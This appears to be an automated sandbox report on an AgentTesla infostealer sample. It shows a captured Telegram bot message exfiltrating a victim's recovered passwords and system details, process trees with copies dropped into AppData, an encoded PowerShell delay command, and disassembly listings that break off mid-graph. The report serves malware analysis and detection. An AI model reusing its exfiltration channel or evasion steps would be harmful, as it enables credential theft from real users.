                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":284,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333667,"document":{"file_name":"user-888683 2023-03-20 18-34-26.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBHGQYmSOqXzAbpkzNM4JK4my7ity6AAIuDwACJVnIUJXaN9ousW0ULwQ","file_unique_id":"AgADLg8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 18:34:26\nUser Name: user/888683\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:18:31:46
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      Imagebase:0x740000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:18:31:54
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                      Imagebase:0xf90000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Reputation:high

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:18:31:54
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c72c0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:18:32:22
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      Imagebase:0x870000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.621406129.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:18:32:30
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                                                                                      Imagebase:0xe10000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 67%, ReversingLabs
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:18:32:39
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                      Imagebase:0x240000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 67%, ReversingLabs
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:18:32:47
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                      Imagebase:0xf90000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:18:32:47
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c72c0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:18:32:49
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                                                                                      Imagebase:0x440000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:18:32:59
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                      Imagebase:0xd30000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:18:33:12
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                      Imagebase:0xf90000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:18:33:13
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c72c0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:18:33:20
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Imagebase:0x1d0000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:18:33:20
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Imagebase:0xb70000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.578941562.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:18:33:40
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                      Imagebase:0xf90000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:18:33:40
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c72c0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:21
                                                                                      Start time:18:33:49
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      Imagebase:0x790000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.620853028.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:7.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:58
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 8970 12a1e80 8971 12a1e94 8970->8971 8972 12a1e9d 8971->8972 8974 12a20ba 8971->8974 8981 12a2318 8974->8981 8986 12a22b6 8974->8986 8991 12a2191 8974->8991 8996 12a21a0 8974->8996 9001 12a229c 8974->9001 8975 12a20c3 8975->8972 8982 12a231e 8981->8982 9006 12a2860 8982->9006 9011 12a2851 8982->9011 8985 12a2330 8985->8975 8987 12a22c9 8986->8987 8988 12a22db 8986->8988 9024 12a25a8 8987->9024 9029 12a25a0 8987->9029 8992 12a21e4 8991->8992 8993 12a22db 8992->8993 8994 12a25a8 2 API calls 8992->8994 8995 12a25a0 2 API calls 8992->8995 8994->8993 8995->8993 8997 12a21e4 8996->8997 8998 12a22db 8997->8998 8999 12a25a8 2 API calls 8997->8999 9000 12a25a0 2 API calls 8997->9000 8999->8998 9000->8998 9002 12a224f 9001->9002 9003 12a22db 9002->9003 9004 12a25a8 2 API calls 9002->9004 9005 12a25a0 2 API calls 9002->9005 9004->9003 9005->9003 9007 12a286e 9006->9007 9016 12a28a8 9007->9016 9020 12a2899 9007->9020 9008 12a287e 9008->8985 9012 12a286e 9011->9012 9014 12a28a8 RtlEncodePointer 9012->9014 9015 12a2899 RtlEncodePointer 9012->9015 9013 12a287e 9013->8985 9014->9013 9015->9013 9017 12a28e1 9016->9017 9018 12a2907 RtlEncodePointer 9017->9018 9019 12a2930 9017->9019 9018->9019 9019->9008 9021 12a28a8 9020->9021 9022 12a2930 9021->9022 9023 12a2907 RtlEncodePointer 9021->9023 9022->9008 9023->9022 9025 12a25b6 9024->9025 9034 12a25e8 9025->9034 9038 12a25f8 9025->9038 9026 12a25c6 9026->8988 9030 12a25b6 9029->9030 9032 12a25e8 RtlEncodePointer 9030->9032 9033 12a25f8 RtlEncodePointer 9030->9033 9031 12a25c6 9031->8988 9032->9031 9033->9031 9035 12a25f8 9034->9035 9036 12a265c RtlEncodePointer 9035->9036 9037 12a2685 9035->9037 9036->9037 9037->9026 9039 12a2632 9038->9039 9040 12a265c RtlEncodePointer 9039->9040 9041 12a2685 9039->9041 9040->9041 9041->9026

                                                                                        Executed Functions

                                                                                        Function 012A25E8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 12a25e8-12a263a 4 12a263c-12a263e 0->4 5 12a2640 0->5 6 12a2645-12a2650 4->6 5->6 7 12a2652-12a2683 RtlEncodePointer 6->7 8 12a26b1-12a26be 6->8 10 12a268c-12a26ac 7->10 11 12a2685-12a268b 7->11 10->8 11->10
                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012A2672
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.391274226.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_12a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: da10a26346e826f60501b22c1e8b3efe8c5486314cdbc84a366cc5bb7fe399c6
                                                                                        • Instruction ID: c4620396c6aabccd8ebb21aa9be4d6e3870768e5a6cf830fc0c7d4a976e2840f
                                                                                        • Opcode Fuzzy Hash: da10a26346e826f60501b22c1e8b3efe8c5486314cdbc84a366cc5bb7fe399c6
                                                                                        • Instruction Fuzzy Hash: 1021BBB1901305CFCB60EFAAC54839ABBF4EF08324F648469D449AB641C3786984CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012A2899 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 13 12a2899-12a28e8 call 12a26d0 call 12a2728 19 12a28ea-12a28ec 13->19 20 12a28ee 13->20 21 12a28f3-12a28fb 19->21 20->21 22 12a28fd-12a292e RtlEncodePointer 21->22 23 12a2957-12a2969 21->23 25 12a2930-12a2936 22->25 26 12a2937-12a294d 22->26 25->26 26->23
                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012A291D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.391274226.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_12a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: 60abee017cc9b6099d778ee8996029fb429808b51f65b75f2d9759a2e7811f8a
                                                                                        • Instruction ID: 022d3fe4a1c36673c2c2763927e0e8dd6b8eb131fc674ff27946f6b450fd7e41
                                                                                        • Opcode Fuzzy Hash: 60abee017cc9b6099d778ee8996029fb429808b51f65b75f2d9759a2e7811f8a
                                                                                        • Instruction Fuzzy Hash: E62179B080134ACFCB20EFA9C94479ABBF4EB08354F50486ED455A7201D3786A44CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012A25F8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 28 12a25f8-12a263a 31 12a263c-12a263e 28->31 32 12a2640 28->32 33 12a2645-12a2650 31->33 32->33 34 12a2652-12a2683 RtlEncodePointer 33->34 35 12a26b1-12a26be 33->35 37 12a268c-12a26ac 34->37 38 12a2685-12a268b 34->38 37->35 38->37
                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012A2672
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.391274226.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_12a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: ba378307afd95c4e0f738578fd1dd580c91190f419c1cacee386b4258a0fa298
                                                                                        • Instruction ID: 8855b92f42000a168ce1cf468ca2ce7f521431bd2df32fb9ba02cbcbcffaa0b4
                                                                                        • Opcode Fuzzy Hash: ba378307afd95c4e0f738578fd1dd580c91190f419c1cacee386b4258a0fa298
                                                                                        • Instruction Fuzzy Hash: 15116AB2901209CFDB60EFAAC54879EBBF8EB48315F648529D409B7740C7B96944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012A28A8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 40 12a28a8-12a28e8 call 12a26d0 call 12a2728 45 12a28ea-12a28ec 40->45 46 12a28ee 40->46 47 12a28f3-12a28fb 45->47 46->47 48 12a28fd-12a292e RtlEncodePointer 47->48 49 12a2957-12a2969 47->49 51 12a2930-12a2936 48->51 52 12a2937-12a294d 48->52 51->52 52->49
                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012A291D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.391274226.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_12a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: a04a33e1ee202585eb0cea5fba545c00fecd293041228812821ff15610f703f7
                                                                                        • Instruction ID: 0f86bcc6c7bdcc3dab813dd335080610fa4b778ad01c617bad70b479ec48eebf
                                                                                        • Opcode Fuzzy Hash: a04a33e1ee202585eb0cea5fba545c00fecd293041228812821ff15610f703f7
                                                                                        • Instruction Fuzzy Hash: C21179B1D1235ACFDB20DF99D94879EBBF8EB18354F508829D455B3600C379A544CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CD4A0 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.390829095.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_11cd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6fd07d0c6f5fd8ebe2d9e4df3eed0ca55982bb5654130dbb7852aec31ee4ea8f
                                                                                        • Instruction ID: ce193bbb2e39e8ac042d79794531a5ed59e4608e2b3ea00dced93b8860f2c8db
                                                                                        • Opcode Fuzzy Hash: 6fd07d0c6f5fd8ebe2d9e4df3eed0ca55982bb5654130dbb7852aec31ee4ea8f
                                                                                        • Instruction Fuzzy Hash: 8C21F471504240DFDF0ADF98E9C0B66BF65FBA4728F24857DE9050A616C33AD845CBE2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CD49B Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.390829095.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_11cd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                        • Instruction ID: 00083f4117adb57e9b0fdef18bd74626966ca56c187a38ead909ce619fcb10a2
                                                                                        • Opcode Fuzzy Hash: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                        • Instruction Fuzzy Hash: 2711DF76904280CFDF16CF48D5C0B16BF72FB94324F2482ADD9054B616C33AD456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:7.5%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:12%
                                                                                        Total number of Nodes:25
                                                                                        Total number of Limit Nodes:3
                                                                                        execution_graph 36227 58af4e8 36228 58af4ee 36227->36228 36229 58af59a 36228->36229 36232 58afaa8 36228->36232 36235 58afab0 PeekMessageW 36228->36235 36233 58afab0 PeekMessageW 36232->36233 36234 58afb27 36233->36234 36234->36228 36236 58afb27 36235->36236 36236->36228 36215 2c45ad0 36216 2c45aee 36215->36216 36219 2c44954 36216->36219 36218 2c45b25 36222 2c475f0 LoadLibraryA 36219->36222 36221 2c476e9 36222->36221 36223 2c4f6d0 36224 2c4f731 GetUserNameW 36223->36224 36226 2c4f81d 36224->36226 36207 69fedd8 36208 69fedf2 36207->36208 36209 69ff074 36208->36209 36210 69fd060 GlobalMemoryStatusEx 36208->36210 36210->36208 36211 69fcdd8 36213 69fcded 36211->36213 36212 69fd034 36213->36212 36214 69fd060 GlobalMemoryStatusEx 36213->36214 36214->36213

                                                                                        Executed Functions

                                                                                        Function 02C4F6D0 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 63 2c4f6d0-2c4f72f 64 2c4f731-2c4f75c 63->64 65 2c4f79a-2c4f79e 63->65 74 2c4f78c 64->74 75 2c4f75e-2c4f760 64->75 66 2c4f7a0-2c4f7c3 65->66 67 2c4f7c9-2c4f7d4 65->67 66->67 68 2c4f7d6-2c4f7de 67->68 69 2c4f7e0-2c4f81b GetUserNameW 67->69 68->69 72 2c4f824-2c4f83a 69->72 73 2c4f81d-2c4f823 69->73 79 2c4f850-2c4f877 72->79 80 2c4f83c-2c4f848 72->80 73->72 78 2c4f791-2c4f794 74->78 76 2c4f782-2c4f78a 75->76 77 2c4f762-2c4f76c 75->77 76->78 83 2c4f770-2c4f77e 77->83 84 2c4f76e 77->84 78->65 86 2c4f887 79->86 87 2c4f879-2c4f87d 79->87 80->79 83->83 88 2c4f780 83->88 84->83 91 2c4f888 86->91 87->86 90 2c4f87f 87->90 88->76 90->86 91->91
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02C4F80B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: c37fe52098926284c40f2ac021e1fced38724783f30f454ea551e5e2bdcac663
                                                                                        • Instruction ID: 16d45a9f2b16ee33c8b5fee5c4ba9762550f07d16f5779427f483bf337989dbe
                                                                                        • Opcode Fuzzy Hash: c37fe52098926284c40f2ac021e1fced38724783f30f454ea551e5e2bdcac663
                                                                                        • Instruction Fuzzy Hash: CA5104B4D002188FDB18CFA9C888B9EBBB1BF48314F15812ED815AB751DB78A844CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 069FB828 Relevance: .6, Instructions: 588COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1445 69fb828-69fb841 1446 69fb843-69fb846 1445->1446 1447 69fb848 1446->1447 1448 69fb856-69fb859 1446->1448 1451 69fb84e-69fb851 1447->1451 1449 69fb85f-69fb862 1448->1449 1450 69fbac6-69fbacf 1448->1450 1453 69fb864-69fb86d 1449->1453 1454 69fb87f-69fb882 1449->1454 1452 69fbad5-69fbadf 1450->1452 1450->1453 1451->1448 1455 69fb873-69fb87a 1453->1455 1456 69fbae0-69fbb11 1453->1456 1457 69fb8a5-69fb8a8 1454->1457 1458 69fb884-69fb8a0 1454->1458 1455->1454 1466 69fbb13-69fbb16 1456->1466 1459 69fb8aa-69fb8af 1457->1459 1460 69fb8b2-69fb8b4 1457->1460 1458->1457 1459->1460 1461 69fb8bb-69fb8be 1460->1461 1462 69fb8b6 1460->1462 1461->1446 1465 69fb8c0-69fb973 1461->1465 1462->1461 1593 69fb979-69fb984 1465->1593 1594 69fba84-69fbaa8 1465->1594 1467 69fbb39-69fbb3c 1466->1467 1468 69fbb18-69fbb34 1466->1468 1471 69fbb3e-69fbb41 1467->1471 1472 69fbbb3-69fbbbc 1467->1472 1468->1467 1476 69fbb43-69fbb4d 1471->1476 1477 69fbb52-69fbb55 1471->1477 1473 69fbced-69fbcf6 1472->1473 1474 69fbbc2 1472->1474 1481 69fbd3a-69fbd6e 1473->1481 1482 69fbcf8-69fbcff 1473->1482 1480 69fbbc7-69fbbca 1474->1480 1476->1477 1478 69fbb5f-69fbb62 1477->1478 1479 69fbb57-69fbb5a 1477->1479 1484 69fbb6a-69fbb6d 1478->1484 1485 69fbb64-69fbb65 1478->1485 1479->1478 1486 69fbbcc-69fbbce 1480->1486 1487 69fbbd1-69fbbd4 1480->1487 1506 69fbd70-69fbd73 1481->1506 1488 69fbd04-69fbd07 1482->1488 1491 69fbb6f-69fbba0 1484->1491 1492 69fbba5-69fbba8 1484->1492 1485->1484 1486->1487 1493 69fbbef-69fbbf2 1487->1493 1494 69fbbd6-69fbbe4 1487->1494 1495 69fbd09-69fbd0f 1488->1495 1496 69fbd16-69fbd18 1488->1496 1491->1492 1492->1495 1499 69fbbae-69fbbb1 1492->1499 1502 69fbbff-69fbc02 1493->1502 1503 69fbbf4-69fbbfa 1493->1503 1494->1485 1519 69fbbea 1494->1519 1500 69fbcd7-69fbcdd 1495->1500 1501 69fbd11 1495->1501 1504 69fbd1f-69fbd22 1496->1504 1505 69fbd1a 1496->1505 1499->1472 1499->1480 1500->1481 1507 69fbcdf-69fbce3 1500->1507 1501->1496 1511 69fbc1b-69fbc1e 1502->1511 1512 69fbc04-69fbc16 1502->1512 1503->1502 1504->1466 1513 